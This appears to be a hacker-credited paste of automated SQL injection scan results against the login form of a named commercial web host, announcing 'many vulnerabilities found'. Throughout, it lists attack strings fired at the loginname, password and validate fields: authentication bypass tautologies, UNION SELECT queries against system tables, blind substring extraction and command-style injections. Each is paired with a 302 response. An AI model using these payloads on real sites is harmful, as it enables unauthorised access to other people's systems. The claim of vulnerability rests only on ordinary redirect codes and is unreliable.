http://www.godaddy.com/
many vulnerabilities found
by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r
SQL Injection String Tests Summary (43860 results recorded)
Failures:
51
Warnings:
0
Passes:
43809
SQL Injection String Test Results
loginname
Submitted Form State:
password:
validate: 1
Results:
Server Status Code: 302 Found
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Found
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Found
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Found
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: '; DESC users; --
Server Status Code: 302 Found
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Found
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Found
Tested value: 1 AND 1=1
Server Status Code: 302 Found
Tested value: 1 EXEC XP_
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 OR 1=1
password
Submitted Form State:
loginname:
validate: 1
Results:
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Found
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Found
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Found
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Found
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Found
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: '; DESC users; --
Server Status Code: 302 Found
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Found
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Found
Tested value: 1 AND 1=1
Server Status Code: 302 Found
Tested value: 1 EXEC XP_
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 OR 1=1
validate
Submitted Form State:
loginname:
password:
Results:
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: %31%27%20%4F%52%20%27%31%27%3D%27%31
Server Status Code: 302 Found
Tested value: 1 UNI/**/ON SELECT ALL FROM WHERE
Server Status Code: 302 Found
Tested value: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Server Status Code: 302 Found
Tested value: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Server Status Code: 302 Found
Tested value: ' OR username IS NOT NULL OR username = '
Server Status Code: 302 Found
Tested value: 1' AND non_existant_table = '1
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: '; DESC users; --
Server Status Code: 302 Found
Tested value: 1 AND USER_NAME() = 'dbo'
Server Status Code: 302 Found
Tested value: 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Server Status Code: 302 Found
Tested value: 1 AND 1=1
Server Status Code: 302 Found
Tested value: 1 EXEC XP_
Server Status Code: 302 Found
Tested value: 1'1
Server Status Code: 302 Found
Tested value: 1' OR '1'='1
Server Status Code: 302 Found
Tested value: 1 OR 1=1
http://www.godaddy.com/
many vulnerabilities found
by: @AnonymousOwn3r http://twitter.com/AnonymousOwn3r